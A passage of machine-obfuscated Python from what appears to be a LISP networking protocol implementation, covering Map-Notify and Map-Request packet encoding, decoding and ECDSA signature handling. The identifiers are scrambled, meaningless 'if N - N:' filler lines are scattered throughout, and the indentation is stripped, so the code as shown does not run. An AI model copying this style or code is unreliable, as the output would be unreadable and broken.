I11 = byte_swap_64 ( self . site_id )
packet += struct . pack ( "QQQ" , oO0ooOoOooO00o00 , o0Ooo00Oo0oo0 , I11 )
return ( packet )
if 51 - 51: II111iiii % I1IiiI * IiII * I1ii11iIi11i
if 72 - 72: IiII % ooOoO0o / Oo0Ooo + iII111i
def decode_xtr_id ( self , packet ) :
oO0o00O = struct . calcsize ( "QQQ" )
if ( len ( packet ) < oO0o00O ) : return ( [ None , None ] )
packet = packet [ len ( packet ) - oO0o00O : : ]
oO0ooOoOooO00o00 , o0Ooo00Oo0oo0 , I11 = struct . unpack ( "QQQ" ,
packet [ : oO0o00O ] )
oO0ooOoOooO00o00 = byte_swap_64 ( oO0ooOoOooO00o00 )
o0Ooo00Oo0oo0 = byte_swap_64 ( o0Ooo00Oo0oo0 )
self . xtr_id = ( oO0ooOoOooO00o00 << 64 ) | o0Ooo00Oo0oo0
self . site_id = byte_swap_64 ( I11 )
return ( True )
if 62 - 62: OOooOOo / i1IIi * Ii1I * Ii1I + oO0o . o0oOOo0O0Ooo
if 28 - 28: iIii1I11I1II1 + OoOoOO00 / IiII / Ii1I * OOooOOo
if 33 - 33: OOooOOo
if 22 - 22: O0 + OOooOOo % i1IIi
if 83 - 83: O0 + Ii1I % i11iIiiIii
if 32 - 32: I1Ii111 % Oo0Ooo - I11i + O0
if 57 - 57: OoO0O00 + I1Ii111 . I11i . i1IIi - o0oOOo0O0Ooo / Oo0Ooo
if 19 - 19: iIii1I11I1II1 . OoO0O00 / OoooooooOO
if 2 - 2: O0 - O0 % I1Ii111 / I1ii11iIi11i
if 76 - 76: OoO0O00 * oO0o - OoO0O00
if 57 - 57: OoooooooOO / OoOoOO00 + oO0o . Ii1I
if 14 - 14: i11iIiiIii % OOooOOo * o0oOOo0O0Ooo * OoOoOO00
if 55 - 55: I1Ii111 * OOooOOo * I1Ii111
if 70 - 70: O0 . Ii1I
if 33 - 33: OOooOOo * Ii1I
if 64 - 64: i11iIiiIii . iIii1I11I1II1
if 7 - 7: OoOoOO00 % ooOoO0o + OoOoOO00 - OoOoOO00 * i11iIiiIii % OoO0O00
if 57 - 57: OOooOOo / OoO0O00 + I1ii11iIi11i
if 60 - 60: O0 * Oo0Ooo % OOooOOo + IiII . OoO0O00 . Oo0Ooo
if 70 - 70: I11i . I1ii11iIi11i * oO0o
if 97 - 97: oO0o . iIii1I11I1II1 - OOooOOo
if 23 - 23: I1ii11iIi11i % I11i
if 18 - 18: OoooooooOO . i1IIi + II111iiii
if 99 - 99: I1Ii111 - I1ii11iIi11i - I1IiiI - I1Ii111 + OoO0O00 + II111iiii
if 34 - 34: I1Ii111 * I11i
if 31 - 31: IiII . oO0o
if 40 - 40: Ii1I - I11i / II111iiii * i1IIi + IiII * II111iiii
if 53 - 53: I1ii11iIi11i - i11iIiiIii . OoO0O00 / OoOoOO00 - I1Ii111
if 99 - 99: Ii1I - IiII - i1IIi / i11iIiiIii . IiII
if 58 - 58: OOooOOo
if 12 - 12: I1IiiI . o0oOOo0O0Ooo * OoooooooOO
if 64 - 64: OoOoOO00 + IiII - i1IIi . II111iiii . OoO0O00
if 31 - 31: oO0o . iII111i - I11i . iIii1I11I1II1 + I11i . OoOoOO00
class lisp_map_notify ( ) :
def __init__ ( self , lisp_sockets ) :
self . etr = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . etr_port = 0
self . retransmit_timer = None
self . lisp_sockets = lisp_sockets
self . retry_count = 0
self . record_count = 0
self . alg_id = LISP_NONE_ALG_ID
self . key_id = 0
self . auth_len = 0
self . auth_data = ""
self . nonce = 0
self . nonce_key = ""
self . packet = None
self . site = ""
self . map_notify_ack = False
self . eid_records = ""
self . eid_list = [ ]
if 86 - 86: I1ii11iIi11i - I1ii11iIi11i / iII111i - I1ii11iIi11i * iII111i + I1Ii111
if 61 - 61: Oo0Ooo / II111iiii / Oo0Ooo / i1IIi . Oo0Ooo - IiII
def print_notify ( self ) :
iIIiiiIiiii11 = binascii . hexlify ( self . auth_data )
if ( self . alg_id == LISP_SHA_1_96_ALG_ID and len ( iIIiiiIiiii11 ) != 40 ) :
iIIiiiIiiii11 = self . auth_data
elif ( self . alg_id == LISP_SHA_256_128_ALG_ID and len ( iIIiiiIiiii11 ) != 64 ) :
iIIiiiIiiii11 = self . auth_data
if 30 - 30: OoooooooOO % OOooOOo
I111 = ( "{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
"{}{}{}, auth-len: {}, auth-data: {}" )
lprint ( I111 . format ( bold ( "Map-Notify-Ack" , False ) if self . map_notify_ack else bold ( "Map-Notify" , False ) ,
# IiII
self . record_count , lisp_hex_string ( self . nonce ) , self . key_id ,
self . alg_id , " (sha1)" if ( self . key_id == LISP_SHA_1_96_ALG_ID ) else ( " (sha2)" if ( self . key_id == LISP_SHA_256_128_ALG_ID ) else "" ) , self . auth_len , iIIiiiIiiii11 ) )
if 20 - 20: OoO0O00 / i11iIiiIii - i1IIi
if 46 - 46: OOooOOo - Oo0Ooo % iII111i % i11iIiiIii
if 80 - 80: I11i - I1ii11iIi11i * Ii1I / OoooooooOO * O0 % OOooOOo
if 49 - 49: II111iiii . I1IiiI * O0 * Ii1I / I1Ii111 * OoooooooOO
def zero_auth ( self , packet ) :
if ( self . alg_id == LISP_NONE_ALG_ID ) : return ( packet )
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
iIIiiiIiiii11 = struct . pack ( "QQI" , 0 , 0 , 0 )
if 82 - 82: Oo0Ooo / Ii1I / Ii1I % Ii1I
if ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
iIIiiiIiiii11 = struct . pack ( "QQQQ" , 0 , 0 , 0 , 0 )
if 20 - 20: ooOoO0o
packet += iIIiiiIiiii11
return ( packet )
if 63 - 63: iIii1I11I1II1 . OoO0O00
if 100 - 100: i1IIi * i1IIi
def encode ( self , eid_records , password ) :
if ( self . map_notify_ack ) :
i1IiIiiiii11 = ( LISP_MAP_NOTIFY_ACK << 28 ) | self . record_count
else :
i1IiIiiiii11 = ( LISP_MAP_NOTIFY << 28 ) | self . record_count
if 26 - 26: OOooOOo . OoO0O00 % OoOoOO00
ii1i1II = struct . pack ( "I" , socket . htonl ( i1IiIiiiii11 ) )
ii1i1II += struct . pack ( "QBBH" , self . nonce , self . key_id , self . alg_id ,
socket . htons ( self . auth_len ) )
if 94 - 94: IiII
if ( self . alg_id == LISP_NONE_ALG_ID ) :
self . packet = ii1i1II + eid_records
return ( self . packet )
if 15 - 15: Ii1I - IiII / O0
if 28 - 28: I1Ii111 . i1IIi / I1ii11iIi11i
if 77 - 77: i11iIiiIii / I1Ii111 / i11iIiiIii % OoOoOO00 - I1Ii111
if 80 - 80: I1Ii111 % OoOoOO00 . OoooooooOO . II111iiii % IiII
if 6 - 6: I1Ii111 % IiII / Ii1I + I1Ii111 . oO0o
ii1i1II = self . zero_auth ( ii1i1II )
ii1i1II += eid_records
if 70 - 70: iIii1I11I1II1 / Ii1I
IiI1I1i1 = lisp_hash_me ( ii1i1II , self . alg_id , password , False )
if 61 - 61: O0 * o0oOOo0O0Ooo + I1Ii111 - OOooOOo . I1IiiI - IiII
i1 = struct . calcsize ( "I" ) + struct . calcsize ( "QHH" )
iI1i1i1i1i = self . auth_len
self . auth_data = IiI1I1i1
ii1i1II = ii1i1II [ 0 : i1 ] + IiI1I1i1 + ii1i1II [ i1 + iI1i1i1i1i : : ]
self . packet = ii1i1II
return ( ii1i1II )
if 7 - 7: I1ii11iIi11i
if 81 - 81: Oo0Ooo % II111iiii % o0oOOo0O0Ooo / I11i
def decode ( self , packet ) :
IiIIIii1iIII1 = packet
o00OooooOOOO = "I"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 95 - 95: OoOoOO00 - O0 % OoooooooOO
i1IiIiiiii11 = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
i1IiIiiiii11 = socket . ntohl ( i1IiIiiiii11 [ 0 ] )
self . map_notify_ack = ( ( i1IiIiiiii11 >> 28 ) == LISP_MAP_NOTIFY_ACK )
self . record_count = i1IiIiiiii11 & 0xff
packet = packet [ oO0o00O : : ]
if 13 - 13: i11iIiiIii
o00OooooOOOO = "QBBH"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 54 - 54: OOooOOo . I1ii11iIi11i * I11i % I1Ii111 . O0 * IiII
self . nonce , self . key_id , self . alg_id , self . auth_len = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
if 87 - 87: Ii1I % I1ii11iIi11i * Oo0Ooo
self . nonce_key = lisp_hex_string ( self . nonce )
self . auth_len = socket . ntohs ( self . auth_len )
packet = packet [ oO0o00O : : ]
self . eid_records = packet [ self . auth_len : : ]
if 59 - 59: Oo0Ooo / I11i - iIii1I11I1II1 * iIii1I11I1II1
if ( self . auth_len == 0 ) : return ( self . eid_records )
if 18 - 18: I11i * I1ii11iIi11i / i11iIiiIii / iIii1I11I1II1 * OoooooooOO . OOooOOo
if 69 - 69: Oo0Ooo * ooOoO0o
if 91 - 91: o0oOOo0O0Ooo . ooOoO0o / OoO0O00 / i11iIiiIii * o0oOOo0O0Ooo
if 52 - 52: I1IiiI - i11iIiiIii / IiII . oO0o
if ( len ( packet ) < self . auth_len ) : return ( None )
if 38 - 38: oO0o + OoooooooOO * OoOoOO00 % oO0o
iI1i1i1i1i = self . auth_len
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
o0oO000oO , IiiIi1 , o0000o0OOOo = struct . unpack ( "QQI" , packet [ : iI1i1i1i1i ] )
iiiiiI1iii11 = ""
if 91 - 91: i1IIi - I1ii11iIi11i * I1IiiI
if ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
o0oO000oO , IiiIi1 , o0000o0OOOo , iiiiiI1iii11 = struct . unpack ( "QQQQ" ,
packet [ : iI1i1i1i1i ] )
if 24 - 24: OoOoOO00 * Ii1I
self . auth_data = lisp_concat_auth_data ( self . alg_id , o0oO000oO , IiiIi1 ,
o0000o0OOOo , iiiiiI1iii11 )
if 17 - 17: OoO0O00 . I1IiiI * O0
oO0o00O = struct . calcsize ( "I" ) + struct . calcsize ( "QHH" )
packet = self . zero_auth ( IiIIIii1iIII1 [ : oO0o00O ] )
oO0o00O += iI1i1i1i1i
packet += IiIIIii1iIII1 [ oO0o00O : : ]
return ( packet )
if 81 - 81: OOooOOo
if 58 - 58: II111iiii . I1Ii111 . Ii1I * OoooooooOO / Ii1I / I11i
if 41 - 41: I11i + OoO0O00 . iII111i
if 73 - 73: i11iIiiIii * I1IiiI + o0oOOo0O0Ooo / oO0o
if 56 - 56: i1IIi
if 11 - 11: i11iIiiIii % o0oOOo0O0Ooo / I11i * OoooooooOO
if 82 - 82: IiII
if 10 - 10: Oo0Ooo % OOooOOo / I11i * IiII - o0oOOo0O0Ooo
if 54 - 54: i11iIiiIii / iIii1I11I1II1 % I1ii11iIi11i / I1IiiI . iIii1I11I1II1 / iII111i
if 1 - 1: I1Ii111 / OoOoOO00 * OoOoOO00 - o0oOOo0O0Ooo % Ii1I
if 96 - 96: IiII / Ii1I % OoO0O00 . iIii1I11I1II1
if 30 - 30: I11i - OoO0O00
if 15 - 15: OoooooooOO
if 31 - 31: II111iiii
if 62 - 62: iIii1I11I1II1 % I1Ii111 % I1ii11iIi11i * IiII
if 87 - 87: IiII
if 45 - 45: oO0o + II111iiii * O0 % OOooOOo . iIii1I11I1II1
if 55 - 55: IiII
if 43 - 43: OOooOOo
if 17 - 17: i11iIiiIii
if 94 - 94: OoooooooOO - IiII + oO0o . OoooooooOO / i1IIi
if 53 - 53: I1Ii111 % I1ii11iIi11i
if 17 - 17: OoooooooOO % Ii1I % O0
if 46 - 46: iII111i + I1Ii111 % OoooooooOO * I1ii11iIi11i
if 89 - 89: IiII - IiII % iII111i / I11i + oO0o - IiII
if 97 - 97: Ii1I % OoOoOO00 / I1ii11iIi11i / iIii1I11I1II1 * OoooooooOO * OOooOOo
if 80 - 80: oO0o / O0
if 55 - 55: I1IiiI * I11i / O0 % OoOoOO00
if 71 - 71: i11iIiiIii * OoOoOO00 * OOooOOo + oO0o + Oo0Ooo
if 59 - 59: IiII
if 54 - 54: OOooOOo
if 27 - 27: OoOoOO00 - OoO0O00 + o0oOOo0O0Ooo + ooOoO0o . OoO0O00
if 86 - 86: II111iiii - OoooooooOO - ooOoO0o % iII111i
if 16 - 16: ooOoO0o + Oo0Ooo + OoooooooOO
if 87 - 87: I1IiiI . oO0o / IiII - OoooooooOO
if 33 - 33: oO0o % OoO0O00 . iIii1I11I1II1 / IiII
if 3 - 3: Ii1I + OoO0O00
if 60 - 60: OoO0O00 . OoOoOO00 - I1ii11iIi11i - I1IiiI - II111iiii % Oo0Ooo
if 62 - 62: O0 + iII111i - iII111i % iIii1I11I1II1
if 47 - 47: I1Ii111 + I1IiiI
if 40 - 40: iIii1I11I1II1 % Ii1I + II111iiii - I1IiiI
if 80 - 80: oO0o
if 81 - 81: OoooooooOO / ooOoO0o * iIii1I11I1II1 . Oo0Ooo + oO0o / O0
if 84 - 84: II111iiii - o0oOOo0O0Ooo
if 78 - 78: IiII
if 58 - 58: i11iIiiIii - OoOoOO00
if 67 - 67: I1ii11iIi11i / iII111i + iIii1I11I1II1 % I1IiiI
if 99 - 99: ooOoO0o . Ii1I
if 92 - 92: i1IIi
if 68 - 68: OoO0O00 % IiII - oO0o - ooOoO0o . Oo0Ooo
class lisp_map_request ( ) :
def __init__ ( self ) :
self . auth_bit = False
self . map_data_present = False
self . rloc_probe = False
self . smr_bit = False
self . pitr_bit = False
self . smr_invoked_bit = False
self . mobile_node = False
self . xtr_id_present = False
self . local_xtr = False
self . dont_reply_bit = False
self . itr_rloc_count = 0
self . record_count = 0
self . nonce = 0
self . signature_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . target_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . target_group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . itr_rlocs = [ ]
self . keys = None
self . privkey_filename = None
self . map_request_signature = None
self . subscribe_bit = False
self . xtr_id = None
if 30 - 30: OoooooooOO % o0oOOo0O0Ooo + ooOoO0o * OoO0O00
if 57 - 57: I11i + iIii1I11I1II1 . OoO0O00 + oO0o
def print_prefix ( self ) :
if ( self . target_group . is_null ( ) ) :
return ( green ( self . target_eid . print_prefix ( ) , False ) )
if 4 - 4: Ii1I
return ( green ( self . target_eid . print_sg ( self . target_group ) , False ) )
if 43 - 43: i1IIi . I1IiiI * iIii1I11I1II1 * i11iIiiIii - OOooOOo + ooOoO0o
if 56 - 56: Oo0Ooo % i11iIiiIii / Ii1I . I1Ii111 . OoO0O00 - OoOoOO00
def print_map_request ( self ) :
oOo0 = ""
if ( self . xtr_id != None and self . subscribe_bit ) :
oOo0 = "subscribe, xtr-id: 0x{}, " . format ( lisp_hex_string ( self . xtr_id ) )
if 32 - 32: I1Ii111 / oO0o / I1IiiI
if 22 - 22: OoO0O00 - OoOoOO00 . Oo0Ooo + o0oOOo0O0Ooo
if 69 - 69: oO0o - I1IiiI
I111 = ( "{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
"count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
"afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:" )
if 10 - 10: i1IIi / iII111i . II111iiii * i1IIi % OoooooooOO
lprint ( I111 . format ( bold ( "Map-Request" , False ) , "A" if self . auth_bit else "a" ,
# O0 * Oo0Ooo % I1Ii111 - O0 * I11i
"D" if self . map_data_present else "d" ,
"R" if self . rloc_probe else "r" ,
"S" if self . smr_bit else "s" ,
"P" if self . pitr_bit else "p" ,
"I" if self . smr_invoked_bit else "i" ,
"M" if self . mobile_node else "m" ,
"X" if self . xtr_id_present else "x" ,
"L" if self . local_xtr else "l" ,
"D" if self . dont_reply_bit else "d" , self . itr_rloc_count ,
self . record_count , lisp_hex_string ( self . nonce ) ,
self . source_eid . afi , green ( self . source_eid . print_address ( ) , False ) ,
" (with sig)" if self . map_request_signature != None else "" ,
self . target_eid . afi , green ( self . print_prefix ( ) , False ) , oOo0 ) )
if 48 - 48: oO0o - OoooooooOO + o0oOOo0O0Ooo % i1IIi - I1IiiI + OOooOOo
O0000 = self . keys
for oo0O0oO0o in self . itr_rlocs :
lprint ( " itr-rloc: afi {} {}{}" . format ( oo0O0oO0o . afi ,
red ( oo0O0oO0o . print_address_no_iid ( ) , False ) ,
"" if ( O0000 == None ) else ", " + O0000 [ 1 ] . print_keys ( ) ) )
O0000 = None
if 37 - 37: O0
if 34 - 34: IiII
if 5 - 5: OoO0O00 . I1IiiI
def sign_map_request ( self , privkey ) :
IIiII11i1 = self . signature_eid . print_address ( )
i1Iii = self . source_eid . print_address ( )
oOOooo = self . target_eid . print_address ( )
IiI11IiIIi = lisp_hex_string ( self . nonce ) + i1Iii + oOOooo
self . map_request_signature = privkey . sign ( IiI11IiIIi )
oOOo0OoooOo = binascii . b2a_base64 ( self . map_request_signature )
oOOo0OoooOo = { "source-eid" : i1Iii , "signature-eid" : IIiII11i1 ,
"signature" : oOOo0OoooOo }
return ( json . dumps ( oOOo0OoooOo ) )
if 33 - 33: I11i * iII111i + iIii1I11I1II1 - I1ii11iIi11i
if 11 - 11: II111iiii + OoOoOO00 * I11i
def verify_map_request_sig ( self , pubkey ) :
i1IiIII = green ( self . signature_eid . print_address ( ) , False )
if ( pubkey == None ) :
lprint ( "Public-key not found for signature-EID {}" . format ( i1IiIII ) )
return ( False )
if 89 - 89: ooOoO0o + oO0o + Ii1I - OOooOOo
if 12 - 12: OoOoOO00 - o0oOOo0O0Ooo - I1Ii111 / I11i
i1Iii = self . source_eid . print_address ( )
oOOooo = self . target_eid . print_address ( )
IiI11IiIIi = lisp_hex_string ( self . nonce ) + i1Iii + oOOooo
pubkey = binascii . a2b_base64 ( pubkey )
if 17 - 17: OoO0O00 - I1Ii111 - II111iiii / I1Ii111 / Ii1I
I11III111i1I = True
try :
iII1 = ecdsa . VerifyingKey . from_pem ( pubkey )
except :
lprint ( "Invalid public-key in mapping system for sig-eid {}" . format ( self . signature_eid . print_address_no_iid ( ) ) )
if 52 - 52: iII111i % iIii1I11I1II1 . I1ii11iIi11i + oO0o % iII111i * iII111i
I11III111i1I = False
if 83 - 83: oO0o - I1Ii111
if 46 - 46: i11iIiiIii
if ( I11III111i1I ) :
try :
I11III111i1I = iII1 . verify ( self . map_request_signature , IiI11IiIIi )
except :
I11III111i1I = False
if 33 - 33: ooOoO0o / iII111i * Ii1I % i1IIi
if 50 - 50: Oo0Ooo - O0 - oO0o % o0oOOo0O0Ooo / iII111i % iIii1I11I1II1
if 9 - 9: OoOoOO00 * o0oOOo0O0Ooo
I1i1I11I = bold ( "passed" if I11III111i1I else "failed" , False )
lprint ( "Signature verification {} for EID {}" . format ( I1i1I11I , i1IiIII ) )
return ( I11III111i1I )
if 85 - 85: I1ii11iIi11i + iIii1I11I1II1 + I1Ii111 * i1IIi - O0 % iII111i
if 32 - 32: Ii1I % I11i + OOooOOo % OoooooooOO
def encode ( self , probe_dest , probe_port ) :
i1IiIiiiii11 = ( LISP_MAP_REQUEST << 28 ) | self . record_count
i1IiIiiiii11 = i1IiIiiiii11 | ( self . itr_rloc_count << 8 )
if ( self . auth_bit ) : i1IiIiiiii11 |= 0x08000000
if ( self . map_data_present ) : i1IiIiiiii11 |= 0x04000000
if ( self . rloc_probe ) : i1IiIiiiii11 |= 0x02000000
if ( self . smr_bit ) : i1IiIiiiii11 |= 0x01000000
if ( self . pitr_bit ) : i1IiIiiiii11 |= 0x00800000
if ( self . smr_invoked_bit ) : i1IiIiiiii11 |= 0x00400000
if ( self . mobile_node ) : i1IiIiiiii11 |= 0x00200000
if ( self . xtr_id_present ) : i1IiIiiiii11 |= 0x00100000
if ( self . local_xtr ) : i1IiIiiiii11 |= 0x00004000
if ( self . dont_reply_bit ) : i1IiIiiiii11 |= 0x00002000
if 68 - 68: I11i
ii1i1II = struct . pack ( "I" , socket . htonl ( i1IiIiiiii11 ) )
ii1i1II += struct . pack ( "Q" , self . nonce )
if 13 - 13: i11iIiiIii - ooOoO0o
if 54 - 54: I1IiiI * I1IiiI - I11i . O0 . iII111i - Ii1I
if 86 - 86: I1IiiI . II111iiii * i1IIi % I1IiiI . OOooOOo
if 79 - 79: OoO0O00 + O0 * OOooOOo
if 51 - 51: i1IIi - oO0o / oO0o % o0oOOo0O0Ooo
if 98 - 98: OoO0O00 * ooOoO0o + i1IIi + IiII - i1IIi % OoOoOO00
iiiI1iiIiII1 = False
oOo0oOOoo0O = self . privkey_filename
if ( oOo0oOOoo0O != None and os . path . exists ( oOo0oOOoo0O ) ) :
iI1IiI11Ii11i = open ( oOo0oOOoo0O , "r" ) ; iII1 = iI1IiI11Ii11i . read ( ) ; iI1IiI11Ii11i . close ( )
try :
iII1 = ecdsa . SigningKey . from_pem ( iII1 )
except :
return ( None )
if 67 - 67: ooOoO0o . iIii1I11I1II1 . OoO0O00 + I1Ii111
o0OOOO00O = self . sign_map_request ( iII1 )
iiiI1iiIiII1 = True
elif ( self . map_request_signature != None ) :
oOOo0OoooOo = binascii . b2a_base64 ( self . map_request_signature )
o0OOOO00O = { "source-eid" : self . source_eid . print_address ( ) ,
"signature-eid" : self . signature_eid . print_address ( ) ,
"signature" : oOOo0OoooOo }
o0OOOO00O = json . dumps ( o0OOOO00O )
iiiI1iiIiII1 = True
if 58 - 58: OoOoOO00
if ( iiiI1iiIiII1 ) :
iiii1II = LISP_LCAF_JSON_TYPE
I1I1iiI1iIIii = socket . htons ( LISP_AFI_LCAF )
o00O0oOO0o = socket . htons ( len ( o0OOOO00O ) + 2 )
O0000000oooOO = socket . htons ( len ( o0OOOO00O ) )
ii1i1II += struct . pack ( "HBBBBHH" , I1I1iiI1iIIii , 0 , 0 , iiii1II , 0 ,
o00O0oOO0o , O0000000oooOO )
ii1i1II += o0OOOO00O
ii1i1II += struct . pack ( "H" , 0 )
else :
if ( self . source_eid . instance_id != 0 ) :
ii1i1II += struct . pack ( "H" , socket . htons ( LISP_AFI_LCAF ) )
ii1i1II += self . source_eid . lcaf_encode_iid ( )
else :
ii1i1II += struct . pack ( "H" , socket . htons ( self . source_eid . afi ) )
ii1i1II += self . source_eid . pack_address ( )
if 7 - 7: OoO0O00 - ooOoO0o % i1IIi
if 24 - 24: OoO0O00 % O0 % I11i
if 61 - 61: ooOoO0o . iII111i / ooOoO0o * OoooooooOO
if 13 - 13: II111iiii
if 17 - 17: II111iiii
if 66 - 66: IiII * oO0o
if 73 - 73: i11iIiiIii + O0 % O0
if ( probe_dest ) :
if ( probe_port == 0 ) : probe_port = LISP_DATA_PORT
oOo0O = probe_dest . print_address_no_iid ( ) + ":" + str ( probe_port )
if 70 - 70: II111iiii * OoooooooOO - Ii1I + oO0o * O0
if ( lisp_crypto_keys_by_rloc_encap . has_key ( oOo0O ) ) :
self . keys = lisp_crypto_keys_by_rloc_encap [ oOo0O ]
if 49 - 49: oO0o . Ii1I . OoOoOO00 - I1ii11iIi11i
if 74 - 74: ooOoO0o % I1ii11iIi11i * i1IIi
if 18 - 18: OoOoOO00
if 30 - 30: II111iiii
if 27 - 27: i1IIi - iIii1I11I1II1 + O0 % Oo0Ooo / OOooOOo + i1IIi
if 48 - 48: Oo0Ooo
if 70 - 70: OoooooooOO * i11iIiiIii
for oo0O0oO0o in self . itr_rlocs :
if ( lisp_data_plane_security and self . itr_rlocs . index ( oo0O0oO0o ) == 0 ) :
if ( self . keys == None or self . keys [ 1 ] == None ) :
O0000 = lisp_keys ( 1 )
self . keys = [ None , O0000 , None , None ]
if 60 - 60: IiII / iIii1I11I1II1 + OoooooooOO - I1ii11iIi11i * i11iIiiIii
O0000 = self . keys [ 1 ]
O0000 . add_key_by_nonce ( self . nonce )
ii1i1II += O0000 . encode_lcaf ( oo0O0oO0o )
else :
ii1i1II += struct . pack ( "H" , socket . htons ( oo0O0oO0o . afi ) )
ii1i1II += oo0O0oO0o . pack_address ( )
if 47 - 47: O0 . I1IiiI / ooOoO0o % i11iIiiIii
if 47 - 47: Ii1I . OoOoOO00 . iIii1I11I1II1 . o0oOOo0O0Ooo
if 39 - 39: o0oOOo0O0Ooo
Ooo0o00 = 0 if self . target_eid . is_binary ( ) == False else self . target_eid . mask_len
if 75 - 75: iIii1I11I1II1 * iII111i / OoOoOO00 * II111iiii . i1IIi
if 6 - 6: Ii1I % Ii1I / OoooooooOO * oO0o . I1IiiI . i1IIi
O00 = 0
if ( self . subscribe_bit ) :
O00 = 0x80
self . xtr_id_present = True
if ( self . xtr_id == None ) :
self . xtr_id = random . randint ( 0 , ( 2 ** 128 ) - 1 )
if 74 - 74: iII111i / OoOoOO00 % oO0o / i1IIi
if 19 - 19: O0 + OoOoOO00 * OoOoOO00 . iII111i
if 73 - 73: ooOoO0o
o00OooooOOOO = "BB"
ii1i1II += struct . pack ( o00OooooOOOO , O00 , Ooo0o00 )
if 14 - 14: Oo0Ooo % iIii1I11I1II1 - iIii1I11I1II1 . iIii1I11I1II1 - o0oOOo0O0Ooo * I1Ii111
if ( self . target_group . is_null ( ) == False ) :
ii1i1II += struct . pack ( "H" , socket . htons ( LISP_AFI_LCAF ) )
ii1i1II += self . target_eid . lcaf_encode_sg ( self . target_group )
elif ( self . target_eid . instance_id != 0 or
self . target_eid . is_geo_prefix ( ) ) :
ii1i1II += struct . pack ( "H" , socket . htons ( LISP_AFI_LCAF ) )
ii1i1II += self . target_eid . lcaf_encode_iid ( )
else :
ii1i1II += struct . pack ( "H" , socket . htons ( self . target_eid . afi ) )
ii1i1II += self . target_eid . pack_address ( )
if 10 - 10: OoO0O00 - II111iiii % o0oOOo0O0Ooo - OoOoOO00 + OoO0O00
if 88 - 88: iIii1I11I1II1 % ooOoO0o + o0oOOo0O0Ooo * OoOoOO00 / I11i . OoO0O00
if 66 - 66: iIii1I11I1II1 * II111iiii . iIii1I11I1II1 * i11iIiiIii + I11i + Ii1I
if 94 - 94: i1IIi * I11i - OoooooooOO . i1IIi / o0oOOo0O0Ooo
if 51 - 51: i11iIiiIii * OoooooooOO
if ( self . subscribe_bit ) : ii1i1II = self . encode_xtr_id ( ii1i1II )
return ( ii1i1II )
if 23 - 23: II111iiii + I11i / O0 . I11i . I1Ii111 + iIii1I11I1II1
if 2 - 2: i1IIi . O0 / o0oOOo0O0Ooo . II111iiii / OoO0O00 % i1IIi
def lcaf_decode_json ( self , packet ) :
o00OooooOOOO = "BBBBHH"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 12 - 12: o0oOOo0O0Ooo
Ooo0o00O0O0oO , OO000OOO , iiii1II , o000OOooo000O , o00O0oOO0o , O0000000oooOO = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
if 69 - 69: O0 . iII111i
if 96 - 96: O0
if ( iiii1II != LISP_LCAF_JSON_TYPE ) : return ( packet )
if 89 - 89: I1ii11iIi11i - Oo0Ooo
if 26 - 26: ooOoO0o % ooOoO0o / II111iiii / iII111i
if 2 - 2: i1IIi / i11iIiiIii + I1IiiI
if 95 - 95: I1ii11iIi11i / IiII % iIii1I11I1II1 + O0
o00O0oOO0o = socket . ntohs ( o00O0oOO0o )
O0000000oooOO = socket . ntohs ( O0000000oooOO )
packet = packet [ oO0o00O : : ]
if ( len ( packet ) < o00O0oOO0o ) : return ( None )
if ( o00O0oOO0o != O0000000oooOO + 2 ) : return ( None )
if 6 - 6: IiII
if 73 - 73: o0oOOo0O0Ooo % o0oOOo0O0Ooo . OOooOOo * I1ii11iIi11i - Ii1I
if 97 - 97: IiII
if 15 - 15: O0 - I1IiiI / i1IIi . I1Ii111
try :
o0OOOO00O = json . loads ( packet [ 0 : O0000000oooOO ] )
except :
return ( None )
if 64 - 64: ooOoO0o / i1IIi
packet = packet [ O0000000oooOO : : ]
if 100 - 100: II111iiii
if 16 - 16: Ii1I
if 96 - 96: o0oOOo0O0Ooo / I1Ii111 % Ii1I - ooOoO0o
if 35 - 35: OOooOOo
o00OooooOOOO = "H"
oO0o00O = struct . calcsize ( o00OooooOOOO )
oO0oO00 = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] ) [ 0 ]
packet = packet [ oO0o00O : : ]
if ( oO0oO00 != 0 ) : return ( packet )
if 90 - 90: i11iIiiIii
if 47 - 47: OoO0O00 . i11iIiiIii
if 9 - 9: OoOoOO00 - I11i . OoooooooOO % ooOoO0o
if 13 - 13: OoO0O00 * iIii1I11I1II1 + II111iiii - Oo0Ooo - OoOoOO00
if ( o0OOOO00O . has_key ( "source-eid" ) == False ) : return ( packet )
I111o0oooO00o0 = o0OOOO00O [ "source-eid" ]
oO0oO00 = LISP_AFI_IPV4 if I111o0oooO00o0 . count ( "." ) == 3 else LISP_AFI_IPV6 if I111o0oooO00o0 . count ( ":" ) == 7 else None
if 3 - 3: i11iIiiIii / I11i + i1IIi - I11i
if ( oO0oO00 == None ) :
lprint ( "Bad JSON 'source-eid' value: {}" . format ( I111o0oooO00o0 ) )
return ( None )
if 50 - 50: i1IIi
if 56 - 56: OoO0O00 + I1Ii111 / Ii1I
self . source_eid . afi = oO0oO00
self . source_eid . store_address ( I111o0oooO00o0 )
if 75 - 75: OoOoOO00
if ( o0OOOO00O . has_key ( "signature-eid" ) == False ) : return ( packet )
I111o0oooO00o0 = o0OOOO00O [ "signature-eid" ]
if ( I111o0oooO00o0 . count ( ":" ) != 7 ) :
